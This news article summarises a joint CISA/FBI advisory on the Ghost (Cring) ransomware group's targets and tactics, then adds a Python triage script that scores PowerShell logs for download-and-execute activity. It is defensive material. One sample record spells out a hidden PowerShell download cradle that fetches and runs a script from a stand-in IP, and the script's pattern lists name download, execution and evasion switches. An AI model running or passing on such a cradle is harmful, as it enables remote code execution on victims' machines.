CISA, FBI warn of Ghost/Cring ransomware attacks

Ghost is a China-based financially motivated ransomware group that has launched attacks against organizations in more than 70 countries -- including its own.

U.S. authorities published a joint advisory Wednesday warning of attacks from the long-running Ghost ransomware group.

Ghost, also known as Cring, is a ransomware group first identified in early 2021 in campaigns including one targeting a vulnerability in Fortinet's FortiGate VPNs. The joint advisory from CISA, the FBI and the Multi-State Information Sharing and Analysis Center (MS-ISAC) shared identified indicators of compromise (IOCs), as well as tactics, techniques and procedures (TTPs) related to the gang -- including those identified as recently as this year.

CISA said Ghost actors targeted victims "whose internet facing services ran outdated versions of software and firmware." The threat group, located in China, used vulnerabilities to compromise organizations in more than 70 countries, including its home country. Its activities, which CISA said are financially motivated, target many sectors, including SMBs, critical infrastructure, education, healthcare, government networks, religious institutions and more.

As Ghost rotates its ransomware executable payloads and modifies ransom note text, it has been attributed as Cring, Crypt3r, Hello, Phantom, Strike, Wickrme, HsHarada and Rapture.

Ghost primarily targets public-facing applications associated with multiple vulnerabilities, including Fortinet FortiOS appliances, Adobe ColdFusion servers, Microsoft SharePoint and Microsoft Exchange. Once they gain initial access, the Ghost actors "have been observed uploading a web shell to a compromised server and leveraging Windows Command Prompt and/or PowerShell to download and execute Cobalt Strike Beacon malware that is then implanted on victim systems," the advisory said.

CISA said Ghost generally deploys its ransomware within a few days of gaining access, with persistence not being a major priority for the group; in some cases it has deployed ransomware the same day.

Although many of Ghost's TTPs are common among ransomware actors, the threat actor apparently does not frequently exfiltrate a victim's most sensitive data.

"Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked," the advisory read. "The FBI has observed limited downloading of data to Cobalt Strike Team Servers. Victims and other trusted third parties have reported limited uses of Mega.nz and installed web shells for similar limited data exfiltration. Note: The typical data exfiltration is less than hundreds of gigabytes of data."

Other TTPs, IOCs, and MITRE ATT&CK Tactics and Techniques are included in the full advisory.

As for mitigations, the three agencies advised that organizations maintain regular system backups, patch known vulnerabilities, implement phishing-resistant MFA and monitor for unauthorized use of PowerShell.
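The advisory's description of PowerShell-driven download-and-execute activity after a web shell lands, and its recommendation to monitor for unauthorized PowerShell use, can both be turned into a simple triage over script-block logs. The following is an added example, not code from the advisory or from the agencies that published it: it scores records shaped like Windows PowerShell script-block events (event 4104) by whether the running account is outside an assumed allowlist, whether the block contains download and execution primitives together, and whether common switches that hide the console or pass encoded input are present. The allowlist, the field names, the thresholds and the sample records are all constructed for this illustration.

```python
"""Triage PowerShell script-block log records for download-and-execute
activity and for use by accounts not expected to run PowerShell.

Added example; allowlist, field names and sample records are constructed."""
import re
from dataclasses import dataclass

# Assumed allowlist: accounts that legitimately run PowerShell in this environment.
AUTHORIZED_POWERSHELL_USERS = {"CORP\\svc-patching", "CORP\\admin.jdoe"}

# Indicators grouped by role. Compiled case-insensitively because PowerShell
# cmdlet names and parameter names are not case-sensitive.
DOWNLOAD = [r"DownloadString", r"DownloadFile", r"Invoke-WebRequest", r"\biwr\b", r"Start-BitsTransfer"]
EXECUTE = [r"Invoke-Expression", r"\bIEX\b", r"Start-Process"]
EVASION = [r"-EncodedCommand", r"\s-e(nc|c)?\b", r"-w(indowstyle)?\s+hidden", r"-nop\b", r"-NonInteractive"]


def _compile(patterns):
    return [re.compile(p, re.IGNORECASE) for p in patterns]


DOWNLOAD_RE, EXECUTE_RE, EVASION_RE = _compile(DOWNLOAD), _compile(EXECUTE), _compile(EVASION)


@dataclass
class Finding:
    record_id: str
    user: str
    score: int
    reasons: list


def analyze_script_block(record: dict) -> Finding:
    """Score one record; higher means more like the activity the advisory describes."""
    text = record["ScriptBlockText"]
    user = record["User"]
    score, reasons = 0, []

    # Mitigation from the advisory: PowerShell run by an unexpected account is itself a signal.
    if user not in AUTHORIZED_POWERSHELL_USERS:
        score += 2
        reasons.append(f"PowerShell run by account outside allowlist: {user}")

    dl = [p.pattern for p in DOWNLOAD_RE if p.search(text)]
    ex = [p.pattern for p in EXECUTE_RE if p.search(text)]
    ev = [p.pattern for p in EVASION_RE if p.search(text)]

    if dl:
        score += 1
        reasons.append("download primitive: " + ", ".join(dl))
    if ex:
        score += 1
        reasons.append("execution primitive: " + ", ".join(ex))
    if dl and ex:
        # Download and execute in one block is the shape of the stage-two fetch the advisory describes.
        score += 2
        reasons.append("download and execute combined in one script block")
    if ev:
        score += min(len(ev), 2)
        reasons.append("evasion switches: " + ", ".join(ev))

    return Finding(record["RecordId"], user, score, reasons)


def triage(records, threshold=3):
    """Return findings at or above threshold, highest score first."""
    findings = [analyze_script_block(r) for r in records]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


# Constructed sample records in the shape of PowerShell script-block (4104) event fields.
SAMPLE_RECORDS = [
    {"RecordId": "1001", "User": "CORP\\svc-patching",
     "ScriptBlockText": "Get-HotFix | Where-Object InstalledOn -gt (Get-Date).AddDays(-30)"},
    {"RecordId": "1002", "User": "CORP\\webapp-pool",
     "ScriptBlockText": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                        ".DownloadString('http://203.0.113.10/u.ps1')\""},
    {"RecordId": "1003", "User": "CORP\\admin.jdoe",
     "ScriptBlockText": "Invoke-WebRequest -Uri https://updates.example.invalid/tools.zip "
                        "-OutFile C:\\Temp\\tools.zip"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"record {f.record_id} user={f.user} score={f.score}")
        for r in f.reasons:
            print("   -", r)
```

Only the second record is surfaced: the web application pool account is not on the allowlist, and its script block fetches and runs remote content with the console hidden, which is the pattern the advisory associates with the post-web-shell stage. The third record downloads a file under an authorized account and scores low, which is the point of combining the account check with the content check rather than alerting on every download cmdlet.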

Alexander Culafi is a senior information security news writer and podcast host for Informa TechTarget.